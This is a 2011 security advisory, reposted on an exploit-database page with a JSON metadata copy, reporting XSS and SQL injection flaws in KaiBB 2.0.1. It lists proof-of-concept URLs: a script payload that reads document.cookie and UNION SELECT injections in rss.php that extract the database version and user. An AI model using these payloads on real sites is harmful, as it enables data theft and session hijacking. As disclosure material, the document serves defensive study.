Search...

KaiBB 2.0.1 SQL Injection vulnerability

2011-10-09T00:00:00

ID 1337DAY-ID-16987
Type zdt
Reporter Stefan Schurtz
Modified 2011-10-09T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Author:                     Stefan Schurtz
Affected Software:      Successfully tested on KaiBB 2.0.1
Vendor URL:             http://code.google.com/p/kaibb/
Vendor Status:          informed
CVE-ID:                     -
 
==========================
Vulnerability Description:
==========================
 
KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities
 
==================
Technical Details:
==================
 
Cross-site Scripting
 
http://&lt;target&gt;/kaibb/?'&lt;/script&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://&lt;target&gt;/kaibb/index.php?'&lt;/script&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
 
SQL Injection
 
http://&lt;target&gt;/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://&lt;target&gt;/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://&lt;target&gt;/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
 
=========
Solution:
=========
 
-
 
====================
Disclosure Timeline:
====================
 
08-Oct-2011 - informed developers
08-Oct-2011 - release date of this security advisory
 
========
Credits:
========
 
Vulnerability found and advisory written by Stefan Schurtz.



#  0day.today [2018-02-17]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-16987", "lastseen": "2018-02-17T19:26:33", "viewCount": 5, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-02-17T19:26:33", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-17T19:26:33", "rev": 2}, "vulnersScore": -0.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16987", "description": "Exploit for php platform in category web applications", "title": "KaiBB 2.0.1 SQL Injection vulnerability", "cvelist": [], "sourceData": "Author: Stefan Schurtz\r\nAffected Software: Successfully tested on KaiBB 2.0.1\r\nVendor URL: http://code.google.com/p/kaibb/\r\nVendor Status: informed\r\nCVE-ID: -\r\n \r\n==========================\r\nVulnerability Description:\r\n==========================\r\n \r\nKaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities\r\n \r\n==================\r\nTechnical Details:\r\n==================\r\n \r\nCross-site Scripting\r\n \r\nhttp://<target>/kaibb/?'</script><script>alert(document.cookie)</script>\r\nhttp://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>\r\n \r\nSQL Injection\r\n \r\nhttp://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a\r\nhttp://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a\r\nhttp://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a\r\n \r\n=========\r\nSolution:\r\n=========\r\n \r\n-\r\n \r\n====================\r\nDisclosure Timeline:\r\n====================\r\n \r\n08-Oct-2011 - informed developers\r\n08-Oct-2011 - release date of this security advisory\r\n \r\n========\r\nCredits:\r\n========\r\n \r\nVulnerability found and advisory written by Stefan Schurtz.\r\n\r\n\n\n# 0day.today [2018-02-17] #", "published": "2011-10-09T00:00:00", "references": [], "reporter": "Stefan Schurtz", "modified": "2011-10-09T00:00:00", "href": "https://0day.today/exploit/description/16987"}